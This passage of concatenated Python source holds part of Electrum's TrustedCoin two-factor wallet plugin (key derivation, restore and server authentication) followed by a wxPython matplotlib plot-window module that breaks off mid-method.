xprv, xpub = bip32_root(bip32_seed, 'standard')
xprv, xpub = bip32_private_derivation(xprv, "m/", derivation)
return xprv, xpub
@classmethod
def xkeys_from_seed(self, seed, passphrase):
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
assert passphrase == ''
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), '', "m/")
elif n==12:
xprv1, xpub1 = self.get_xkeys(seed, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.storage.set_keystore_encryption(bool(password))
if encrypt_storage:
wizard.storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.storage.put('x1/', k1.dump())
wizard.storage.put('x2/', k2.dump())
wizard.storage.write()
msg = [
_("Your wallet file is: {}.").format(os.path.abspath(wizard.storage.path)),
_("You need to be online in order to complete the creation of "
"your wallet. If you generated your seed on an offline "
'computer, click on "{}" to close this window, move your '
"wallet file to an online computer, and reopen it with "
"Electrum.").format(_('Cancel')),
_('If you are online, click on "{}" to continue.').format(_('Next'))
]
msg = '\n\n'.join(msg)
wizard.stack = []
wizard.confirm_dialog(title='', message=msg, run_next = lambda x: wizard.run('create_remote_key'))
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard, seed, passphrase):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
storage = wizard.storage
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
storage.put('x1/', k1.dump())
storage.put('x2/', k2.dump())
long_user_id, short_id = get_user_id(storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
k3 = keystore.from_xpub(xpub3)
storage.put('x3/', k3.dump())
storage.set_keystore_encryption(bool(password))
if encrypt_storage:
storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.wallet = Wallet_2fa(storage)
wizard.create_addresses()
def create_remote_key(self, wizard):
email = self.accept_terms_of_use(wizard)
xpub1 = wizard.storage.get('x1/')['xpub']
xpub2 = wizard.storage.get('x2/')['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except socket.error:
wizard.show_message('Server not reachable, aborting')
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
try:
assert _id == short_id, ("user id error", _id, short_id)
assert xpub3 == _xpub3, ("xpub3 error", xpub3, _xpub3)
except Exception as e:
wizard.show_message(str(e))
return
self.check_otp(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3):
otp, reset = self.request_otp_dialog(wizard, short_id, otp_secret)
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except:
wizard.show_message(_('Incorrect password'))
return
k3 = keystore.from_xpub(xpub3)
wizard.storage.put('x3/', k3.dump())
wizard.storage.put('use_trustedcoin', True)
wizard.storage.write()
wizard.wallet = Wallet_2fa(wizard.storage)
wizard.run('create_addresses')
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
try:
assert xpub1 == wizard.storage.get('x1/')['xpub']
assert xpub2 == wizard.storage.get('x2/')['xpub']
except:
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
_, _, _, _, c, k = deserialize_xprv(xprv)
pk = bip32_private_key([0, 0], k, c)
key = regenerate_key(pk)
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.check_otp(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'create_remote_key'
|
plotwindow.py | """ plotwindow.py - wxPython control for displaying matplotlib plots
Chris R. Coughlin (TRI/Austin, Inc.)
"""
__author__ = 'Chris R. Coughlin'
import ui_defaults
from controllers.plotwindow_ctrl import PlotWindowController, ImgPlotWindowController, MegaPlotWindowController
from models import workerthread
from models.mainmodel import get_logger
import wx
from matplotlib.figure import Figure
from matplotlib.widgets import Cursor
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas
from matplotlib.backends.backend_wxagg import NavigationToolbar2WxAgg
import os.path
import Queue
module_logger = get_logger(__name__)
class PlotWindow(wx.Frame):
"""Basic wxPython UI element for displaying matplotlib plots"""
def __init__(self, parent, data_file):
self.parent = parent
self.data_file = data_file
self.controller = PlotWindowController(self, data_file)
module_logger.info("Successfully initialized PlotWindow.")
self.load_data()
def has_data(self):
"""Returns True if data is not None"""
return self.controller.data is not None
def load_data(self):
"""Loads the data set and plots"""
exception_queue = Queue.Queue()
data_thd = workerthread.WorkerThread(exception_queue=exception_queue,
target=self.controller.load_data)
data_thd.start()
while True:
data_thd.join(0.125)
if not data_thd.is_alive():
try:
exc_type, exc = exception_queue.get(block=False)
err_str = str(exc)
if len(err_str) == 0:
err_str = exc_type.__name__
module_logger.error("Unable to load data: {0}".format(err_str))
err_msg = "An error occurred while loading data:\n{0}".format(err_str)
if len(err_msg) > 150:
# Truncate lengthy error messages
err_msg = ''.join([err_msg[:150], "\n(continued)"])
err_dlg = wx.MessageDialog(self.parent, message=err_msg,
caption="Unable To Load Data", style=wx.ICON_ERROR)
err_dlg.ShowModal()
except Queue.Empty:
pass
break
wx.GetApp().Yield(True)
if self.has_data():
self.title = 'Plot - {0}'.format(os.path.basename(self.data_file))
wx.Frame.__init__(self, id=wx.ID_ANY, parent=self.parent, title=self.title)
self.init_menu()
self.init_ui()
self.controller.plot(self.controller.data)
def init_ui(self):
"""Creates the PlotWindow UI"""
parent_x, parent_y = self.parent.GetPositionTuple()
parent_w, parent_h = self.parent.GetSize()
self.SetPosition((parent_x + parent_w + ui_defaults.widget_margin,
ui_defaults.widget_margin))
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.figure = Figure(figsize=(5, 4))
self.canvas = FigureCanvas(self, wx.ID_ANY, self.figure)
self.axes = self.figure.add_subplot(111, picker=True)
self.axes.grid(True)
#self.cursor = Cursor(self.axes, useblit=True, color='green', alpha=0.5, linestyle='--',
# linewidth=2)
self.sizer.Add(self.canvas, 1, ui_defaults.sizer_flags, 0)
self.add_toolbar()
self.SetIcon(self.parent.GetIcon())
self.SetSizerAndFit(self.sizer)
def add_toolbar(self):
"""Creates the matplotlib toolbar (zoom, pan/scroll, etc.)
for the plot"""
self.toolbar = NavigationToolbar2Wx(self.canvas)
self.toolbar.Realize()
if wx.Platform == '__WXMAC__':
self.SetToolBar(self.toolbar)
else:
tw, th = self.toolbar.GetSizeTuple()
fw, fh = self.canvas.GetSizeTuple()
self.toolbar.SetSize(wx.Size(fw, th))
self.sizer.Add(self.toolbar, 0, wx.LEFT | wx.EXPAND, 0)
self.toolbar.update()
def init_menu(self):
"""Creates the main menu"""
self.menubar = wx.MenuBar()
self.init_file_menu()
self.init_plot_menu()
self.init_ops_menu()
self.init_tools_menu()
self.init_help_menu()
self.SetMenuBar(self.menubar)
def init_file_menu(self):
"""Creates the File menu"""
self.file_mnu = wx.Menu()
savedata_mnui = wx.MenuItem(self.file_mnu, wx.ID_ANY, text="Save Current Data",
help="Save current data to disk")
self.Bind(wx.EVT_MENU, self.controller.on_save_data, id=savedata_mnui.GetId())
self.file_mnu.AppendItem(savedata_mnui)
close_mnui = wx.MenuItem(self.file_mnu, wx.ID_ANY, text="Close Window",
help="Close the plot window")
self.Bind(wx.EVT_MENU, self.controller.on_close, id=close_mnui.GetId())
self.file_mnu.AppendItem(close_mnui)
self.menubar.Append(self.file_mnu, "&File")
def init_plot_menu(self):
"""Creates the Plot menu"""
self.plot_mnu = wx.Menu()
self.labels_mnu = wx.Menu() # Titles and Labels
plottitle_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set Plot Title",
help="Set Plot Title")
self.Bind(wx.EVT_MENU, self.controller.on_set_plottitle, id=plottitle_mnui.GetId())
self.labels_mnu.AppendItem(plottitle_mnui)
xlbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set X Axis Label",
help="Set X Axis Label")
self.Bind(wx.EVT_MENU, self.controller.on_set_xlabel, id=xlbl_mnui.GetId())
self.labels_mnu.AppendItem(xlbl_mnui)
ylbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set Y Axis Label",
help="Set Y Axis Label")
self.Bind(wx.EVT_MENU, self.controller.on_set_ylabel, id=ylbl_mnui.GetId())
self.labels_mnu.AppendItem(ylbl_mnui)
self.plot_mnu.AppendMenu(wx.ID_ANY, 'Title And Labels', self.labels_mnu)
gridtoggle_mnui = wx.MenuItem(self.plot_mnu, wx.ID_ANY, text="Toggle Grid",
help="Turns grid on or off")
self.plot_mnu.AppendItem(gridtoggle_mnui)
self.Bind(wx.EVT_MENU, self.controller.on_toggle_grid, id=gridtoggle_mnui.GetId())
self.menubar.Append(self.plot_mnu, "&Plot")
def init_ops_menu(self):
"""Creates the Operations menu"""
self.ops_mnu = wx.Menu()
self.revert_mnui = wx.MenuItem(self.ops_mnu, wx.ID_ANY, text='Revert To Original',
help='Revert to original data set')
self.Bind(wx.EVT_MENU, self.controller.on_revert, id=self.revert_mnui.GetId())
self.ops_mnu.AppendItem(self.revert_mnui)
self.init_specific_ops_menu()
self.menubar.Append(self.ops_mnu, '&Operations')
def init_specific_ops_menu(self):
"""Creates any plot-specific Operations menu items"""
self.rect_mnu = wx.Menu() # Rectification operations
self.fullrect_mnui = wx.MenuItem(self.rect_mnu, wx.ID_ANY, text="Full",
help="Full Rectification")
self.Bind(wx.EVT_MENU, self.controller.on_rectify, id=self.fullrect_mnui.GetId())
self.rect_mnu.AppendItem(self.fullrect_mnui)
self.ops_mnu.AppendMenu(wx.ID_ANY, 'Rectify', self.rect_mnu)
self.gate_mnu = wx.Menu() # Gates operations
for gate in self.controller.gates:
gate_name = self.controller.gates[gate][0]
gate_desc = "Applies a {0} gate function to the data".format(gate_name)
gate_mnui = wx.MenuItem(self.gate_mnu, id=gate, text=gate_name, help=gate_desc)
self.gate_mnu.AppendItem(gate_mnui)
self.Bind(wx.EVT_MENU, self.controller.on_apply_gate, id=gate_mnui.GetId())
self.ops_mnu.AppendMenu(wx.ID_ANY, 'Gates', self.gate_mnu)
def init_tools_menu(self):
"""Initializes the Tools Menu (Plugins and external scripts)"""
self.tools_mnu = wx.Menu()
self.init_plugins_menu()
self.menubar.Append(self.tools_mnu, '&Tools')
def init_plugins_menu(self):
"""Initializes the Plugins menu"""
# If the Plugins menu already exists,
# delete and rebuild. Used to refresh
# list of available plugins after installing
# a new one
plugins_mnu_id = self.tools_mnu.FindItem("Plugins")
if plugins_mnu_id != -1:
self.tools_mnu.RemoveItem(self.tools_mnu.FindItemById(plugins_mnu_id))
self.plugins_mnu = wx.Menu()
plugins = self.controller.available_plugins
for plugin_id, plugin in plugins.items():
plugin_name = plugin[1].name
plugin_description = plugin[1].description
script_mnui = wx.MenuItem(self.tools_mnu, id=plugin_id, text=plugin_name,
help=plugin_description)
self.Bind(wx.EVT_MENU, self.controller.on_run_toolkit, id=script_mnui.GetId())
self.plugins_mnu.AppendItem(script_mnui)
self.plugins_mnu.AppendSeparator()
install_plugin_mnui = wx.MenuItem(self.plugins_mnu, wx.ID_ANY, text="Install Plugin...",
help="Install a local plugin")
self.Bind(wx.EVT_MENU, self.controller.on_install_plugin, id=install_plugin_mnui.GetId())
self.plugins_mnu.AppendItem(install_plugin_mnui)
download_plugin_mnui = wx.MenuItem(self.plugins_mnu, wx.ID_ANY, text="Download Plugin...",
help="Download and install a new plugin")
self.Bind(wx.EVT_MENU, self.controller.on_download_plugin, id=download_plugin_mnui.GetId())
self.plugins_mnu.AppendItem(download_plugin_mnui)
self.tools_mnu.AppendMenu(wx.ID_ANY, "Plugins", self.plugins_mnu)
def init_help_menu(self):
pass
class ImgPlotWindow(PlotWindow):
"""Specialized PlotWindow for handling imgplots"""
def __init__(self, parent, data_file):
self.parent = parent
self.data_file = data_file
self.controller = ImgPlotWindowController(self, data_file)
module_logger.info("Successfully initialized ImgPlotWindow.")
self.load_data()
def load_data(self):
"""Loads the data set and plots"""
exception_queue = Queue.Queue()
data_thd = workerthread.WorkerThread(exception_queue=exception_queue,
target=self.controller.load_data)
data_thd.start()
while True:
data_thd.join(0.125)
if not data_thd.is_alive():
try:
exc_type, exc = exception_queue.get(block=False)
module_logger.error("Unable to load data: {0}".format(exc))
err_msg = "An error occurred while loading data:\n{0}".format(exc)
if len(err_msg) > 150:
# Truncate lengthy error messages
err_msg = ''.join([err_msg[:150], "\n(continued)"])
err_dlg = wx.MessageDialog(self.parent, message=err_msg,
caption="Unable To Load Data", style=wx.ICON_ERROR)
err_dlg.ShowModal()
except Queue.Empty:
pass
break
wx.GetApp().Yield(True)
self.title = 'Plot - {0}'.format(os.path.basename(self.data_file))
wx.Frame.__init__(self, id=wx.ID_ANY, parent=self.parent, title=self.title)
self.init_menu()
self.init_ui()
self.controller.check_data_dims()
self.controller.plot(self.controller.data)
def init_plot_menu(self):
"""Creates the Plot menu"""
self.plot_mnu = wx.Menu()
self.labels_mnu = wx.Menu() # Titles and Labels
plottitle_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set Plot Title",
help="Set Plot Title")
self.Bind(wx.EVT_MENU, self.controller.on_set_plottitle, id=plottitle_mnui.GetId())
self.labels_mnu.AppendItem(plottitle_mnui)
xlbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set X Axis Label",
help="Set X Axis Label")
self.Bind(wx.EVT_MENU, self.controller.on_set_xlabel, id=xlbl_mnui.GetId())
self.labels_mnu.AppendItem(xlbl_mnui)
ylbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set Y Axis Label",
help="Set Y Axis Label")
self.Bind(wx.EVT_MENU, self.controller.on_set_ylabel, id=ylbl_mnui.GetId())
self.labels_mnu.AppendItem(ylbl_mnui)
cbarlbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text='Set Colorbar Label',
help='Set Colorbar Label')
self.Bind(wx.EVT_MENU, self.controller.on_set_cbarlbl, id=cbarlbl_mnui.GetId())
self.labels_mnu.AppendItem(cbarlbl_mnui)
self.plot_mnu.AppendMenu(wx.ID_ANY, "Title And Labels", self.labels_mnu)
self.colormaps_mnu = wx.Menu() # Colormaps
self.preview_cmaps_mnui = wx.MenuItem(self.colormaps_mnu, wx.ID_ANY, text='Preview Colormaps',
help='Preview available colormaps')
self.Bind(wx.EVT_MENU, self.controller.on_preview_cmaps, id=self.preview_cmaps_mnui.GetId())
self.colormaps_mnu.AppendItem(self.preview_cmaps_mnui)
self.select_cmap_mnui = wx.MenuItem(self.colormaps_mnu, wx.ID_ANY, text='Select Colormap...',
help='Selects colormap')
self.Bind(wx.EVT_MENU, self.controller.on_select_cmap, id=self.select_cmap_mnui.GetId())
self.colormaps_mnu.AppendItem(self.select_cmap_mnui)
self.create_cmap_mnui = wx.MenuItem(self.colormaps_mnu, wx.ID_ANY, text='Create Colormap...',
help='Create or edit a colormap')
self.colormaps_mnu.AppendItem(self.create_cmap_mnui)
self.Bind(wx.EVT_MENU, self.controller.on_create_cmap, id=self.create_cmap_mnui.GetId())
self.plot_mnu.AppendMenu(wx.ID_ANY, "Colormaps", self.colormaps_mnu)
gridtoggle_mnui = wx.MenuItem(self.plot_mnu, wx.ID_ANY, text="Toggle Grid",
help="Turns grid on or off")
self.plot_mnu.AppendItem(gridtoggle_mnui)
self.Bind(wx.EVT_MENU, self.controller.on_toggle_grid, id=gridtoggle_mnui.GetId())
self.menubar.Append(self.plot_mnu, "&Plot")
def init_specific_ops_menu(self):
"""Implements imgplot-specific operations for the Operations menu"""
self.manip_mnu = wx.Menu() # Data manipulations
self.flip_mnu = wx.Menu() # Flip data
self.flipud_mnui = wx.MenuItem(self.flip_mnu, wx.ID_ANY, text="Vertically")
self.Bind(wx.EVT_MENU, self.controller.on_flipud, id=self.flipud_mnui.GetId())
self.flip_mnu.AppendItem(self.flipud_mnui)
self.fliplr_mnui = wx.MenuItem(self.flip_mnu, wx.ID_ANY, text="Horizontally")
self.Bind(wx.EVT_MENU, self.controller.on_fliplr, id=self.fliplr_mnui.GetId())
self.flip_mnu.AppendItem(self.fliplr_mnui)
self.manip_mnu.AppendMenu(wx.ID_ANY, 'Flip', self.flip_mnu)
self.rot_mnu = wx.Menu() # Rotate data
self.rot90ccw_mnui = wx.MenuItem(self.rot_mnu, wx.ID_ANY, text="90 Degrees CCW")
self.Bind(wx.EVT_MENU, self.controller.on_rot90ccw, id=self.rot90ccw_mnui.GetId())
self.rot_mnu.AppendItem(self.rot90ccw_mnui)
self.rot90cw_mnui = wx.MenuItem(self.rot_mnu, wx.ID_ANY, text="90 Degreees CW")
self.Bind(wx.EVT_MENU, self.controller.on_rot90cw, id=self.rot90cw_mnui.GetId())
self.rot_mnu.AppendItem(self.rot90cw_mnui)
self.rot180_mnui = wx.MenuItem(self.rot_mnu, wx.ID_ANY, text="180 Degrees")
self.Bind(wx.EVT_MENU, self.controller.on_rot180, id=self.rot180_mnui.GetId())
self.rot_mnu.AppendItem(self.rot180_mnui)
self.manip_mnu.AppendMenu(wx.ID_ANY, 'Rotate', self.rot_mnu)
self.ops_mnu.AppendMenu(wx.ID_ANY, 'Flip/Rotate Data', self.manip_mnu)
self.detrend_mnu = wx.Menu() # Detrending menu
self.detrend_constantx_mnui = wx.MenuItem(self.detrend_mnu, wx.ID_ANY,
text="Constant Horizontal")
self.Bind(wx.EVT_MENU, self.controller.on_detrend_meanx,
id=self.detrend_constantx_mnui.GetId())
self.detrend_mnu.AppendItem(self.detrend_constantx_mnui)
self.detrend_constanty_mnui = wx.MenuItem(self.detrend_mnu, wx.ID_ANY,
text="Constant Vertical")
self.Bind(wx.EVT_MENU, self.controller.on_detrend_meany,
id=self.detrend_constanty_mnui.GetId())
self.detrend_mnu.AppendItem(self.detrend_constanty_mnui)
self.detrend_linearx_mnui = wx.MenuItem(self.detrend_mnu, wx.ID_ANY,
text="Linear Horizontal")
self.Bind(wx.EVT_MENU, self.controller.on_detrend_linearx,
id=self.detrend_linearx_mnui.GetId())
self.detrend_mnu.AppendItem(self.detrend_linearx_mnui)
self.detrend_lineary_mnui = wx.MenuItem(self.detrend_mnu, wx.ID_ANY,
text="Linear Vertical")
self.Bind(wx.EVT_MENU, self.controller.on_detrend_lineary,
id=self.detrend_lineary_mnui.GetId())
self.detrend_mnu.AppendItem(self.detrend_lineary_mnui)
self.ops_mnu.AppendMenu(wx.ID_ANY, 'Detrend Data', self.detrend_mnu)
self.transpose_mnui = wx.MenuItem(self.ops_mnu, wx.ID_ANY, text="Transpose Data")
self.Bind(wx.EVT_MENU, self.controller.on_transpose, id=self.transpose_mnui.GetId())
self.ops_mnu.AppendItem(self.transpose_mnui)
class MegaPlotWindow(PlotWindow):
"""Specialized four-panel PlotWindow for displaying
A, B, and C scans of a three-dimensional dataset"""
def __init__(self, parent, data_file):
self.parent = parent
self.data_file = data_file
self.controller = MegaPlotWindowController(self, data_file)
module_logger.info("Successfully initialized MegaPlotWindow.")
self.load_data()
@property
def axes(self):
"""Returns a tuple of all the view's axes"""
return (self.ascan_axes, self.hbscan_axes,
self.vbscan_axes, self.cscan_axes)
def init_ui(self):
"""Creates the PlotWindow UI"""
parent_x, parent_y = self.parent.GetPositionTuple()
parent_w, parent_h = self.parent.GetSize()
self.SetPosition((parent_x + parent_w + ui_defaults.widget_margin,
ui_defaults.widget_margin))
self.main_panel = wx.Panel(self)
self.main_panel_sizer = wx.BoxSizer(wx.VERTICAL)
self.sizer = wx.BoxSizer(wx.VERTICAL)
# Controls for specifying (x,y,z) position in 3D dataset
self.ctrl_panel = wx.Panel(self.main_panel)
self.ctrl_sizer = wx.BoxSizer(wx.HORIZONTAL)
info_lbl = wx.StaticText(self.ctrl_panel, wx.ID_ANY, u"Coordinates In Data:", wx.DefaultPosition,
wx.DefaultSize)
self.ctrl_sizer.Add(info_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags, ui_defaults.widget_margin)
xpos_lbl = wx.StaticText(self.ctrl_panel, wx.ID_ANY, u"X Position", wx.DefaultPosition, wx.DefaultSize)
self.ctrl_sizer.Add(xpos_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags, ui_defaults.widget_margin)
self.xpos_sc = wx.SpinCtrl(self.ctrl_panel, wx.ID_ANY, value="", min=0, max=self.controller.data.shape[1] - 1)
self.Bind(wx.EVT_SPINCTRL, self.controller.on_xy_change, self.xpos_sc)
self.ctrl_sizer.Add(self.xpos_sc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags, ui_defaults.widget_margin)
ypos_lbl = wx.StaticText(self.ctrl_panel, wx.ID_ANY, u"Y Position", wx.DefaultPosition, wx.DefaultSize)
self.ctrl_sizer.Add(ypos_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags, ui_defaults.widget_margin)
self.ypos_sc = wx.SpinCtrl(self.ctrl_panel, wx.ID_ANY, value="", min=0, max=self.controller.data.shape[0] - 1)
self.Bind(wx.EVT_SPINCTRL, self.controller.on_xy_change, self.ypos_sc)
self.ctrl_sizer.Add(self.ypos_sc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags, ui_defaults.widget_margin)
self.slice_cb = wx.CheckBox(self.ctrl_panel, wx.ID_ANY, "Plot Z Index As C Scan", style=wx.ALIGN_RIGHT)
self.slice_cb.SetToolTipString(u"Use the specified index in Z as the C Scan plot data")
self.slice_cb.SetValue(True)
self.ctrl_sizer.Add(self.slice_cb, ui_defaults.lbl_pct, ui_defaults.sizer_flags, ui_defaults.widget_margin)
self.slice_sc = wx.SpinCtrl(self.ctrl_panel, wx.ID_ANY, value="", min=0, max=self.controller.data.shape[2] - 1)
self.Bind(wx.EVT_SPINCTRL, self.controller.on_sliceidx_change, self.slice_sc)
slice_lbl = wx.StaticText(self.ctrl_panel, wx.ID_ANY, u"Slice Index", wx.DefaultPosition, wx.DefaultSize)
self.ctrl_sizer.Add(slice_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags, ui_defaults.widget_margin)
self.ctrl_sizer.Add(self.slice_sc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags, ui_defaults.widget_margin)
self.ctrl_panel.SetSizerAndFit(self.ctrl_sizer)
self.main_panel_sizer.Add(self.ctrl_panel, ui_defaults.lbl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
self.figure = Figure()
self.canvas = FigureCanvas(self.main_panel, wx.ID_ANY, self.figure)
self.ascan_axes = self.figure.add_subplot(221)
self.vbscan_axes = self.figure.add_subplot(222)
self.hbscan_axes = self.figure.add_subplot(223)
self.cscan_axes = self.figure.add_subplot(224)
self.cscan_cursor = Cursor(self.cscan_axes, useblit=True, color="#4F6581", alpha=0.5)
self.figure.canvas.mpl_connect("button_press_event", self.controller.on_click)
self.main_panel_sizer.Add(self.canvas, 1, ui_defaults.sizer_flags, 0)
self.navtools_cb = wx.CheckBox(self.main_panel, wx.ID_ANY, "Use Plot Navigation Tools")
self.navtools_cb.SetValue(self.controller.get_navtools_config())
self.navtools_cb.SetToolTipString("Check to use pan/zoom tools")
self.Bind(wx.EVT_CHECKBOX, self.controller.on_check_navtools, self.navtools_cb)
self.main_panel_sizer.Add(self.navtools_cb, ui_defaults.lbl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
self.add_toolbar()
self.SetIcon(self.parent.GetIcon())
self.main_panel.SetSizerAndFit(self.main_panel_sizer)
self.sizer.Add(self.main_panel, 1, ui_defaults.sizer_flags, 0)
self.SetSizerAndFit(self.sizer)
def add_toolbar(self):
"""Creates the matplotlib toolbar (zoom, pan/scroll, etc.)
for the plot"""
self.toolbar = NavigationToolbar2Wx(self.canvas)
self.toolbar.Realize()
if wx.Platform == '__WXMAC__':
self.SetToolBar(self.toolbar)
else:
tw, th = self.toolbar.GetSizeTuple()
fw, fh = self.canvas.GetSizeTuple()
self.toolbar.SetSize(wx.Size(fw, th))
self.main_panel_sizer.Add(self.toolbar, 0, wx.LEFT | wx.EXPAND, 0)
self.toolbar.update()
self.toggle_toolbar()
def toggle_toolbar(self):
"""Enables / disables the navigation toolbar and sets
cursors accordingly."""
if self.navtools_enabled():
self.canvas.SetCursor(wx.StockCursor(wx.CURSOR_ARROW))
else:
self.canvas.SetCursor(wx.StockCursor(wx.CURSOR_CROSS))
self.toolbar.Enable(self.navtools_enabled())
self.controller.set_navtools_config(self.navtools_enabled())
def init_plot_menu(self):
"""Creates the Plot menu"""
self.plot_mnu = wx.Menu()
self.labels_mnu = wx.Menu() # Titles and Labels
plottitle_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set Plot Title",
help="Set Plot Title")
self.Bind(wx.EVT_MENU, self.controller.on_set_plottitle, id=plottitle_mnui.GetId())
self.labels_mnu.AppendItem(plottitle_mnui)
xlbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set X Axis Label",
help="Set X Axis Label")
self.Bind(wx.EVT_MENU, self.controller.on_set_xlabel, id=xlbl_mnui.GetId())
self.labels_mnu.AppendItem(xlbl_mnui)
ylbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text="Set Y Axis Label",
help="Set Y Axis Label")
self.Bind(wx.EVT_MENU, self.controller.on_set_ylabel, id=ylbl_mnui.GetId())
self.labels_mnu.AppendItem(ylbl_mnui)
cbarlbl_mnui = wx.MenuItem(self.labels_mnu, wx.ID_ANY, text='Set Colorbar Label',
help='Set Colorbar Label')
self.Bind(wx.EVT_MENU, self.controller.on_set_cbarlbl, id=cbarlbl_mnui.GetId())
self.labels_mnu.AppendItem(cbarlbl_mnui)
self.plot_mnu.AppendMenu(wx.ID_ANY, "Title And Labels", self.labels_mnu)
self.colormaps_mnu = wx.Menu() # Colormaps
self.preview_cmaps_mnui = wx.MenuItem(self.colormaps_mnu, wx.ID_ANY, text='Preview Colormaps',
help='Preview available colormaps')
self.Bind(wx.EVT_MENU, self.controller.on_preview_cmaps, id=self.preview_cmaps_mnui.GetId())
self.colormaps_mnu.AppendItem(self.preview_cmaps_mnui)
self.select_cmap_mnui = wx.MenuItem(self.colormaps_mnu, wx.ID_ANY, text='Select Colormap...',
help='Selects colormap')
self.Bind(wx.EVT_MENU, self.controller.on_select_cmap, id=self.select_cmap_mnui.GetId())
self.colormaps_mnu.AppendItem(self.select_cmap_mnui)
self.create_cmap_mnui = wx.MenuItem(self.colormaps_mnu, wx.ID_ANY, text='Create Colormap...',
help='Create or edit a colormap')
self.colormaps_mnu.AppendItem(self.create_cmap_mnui)
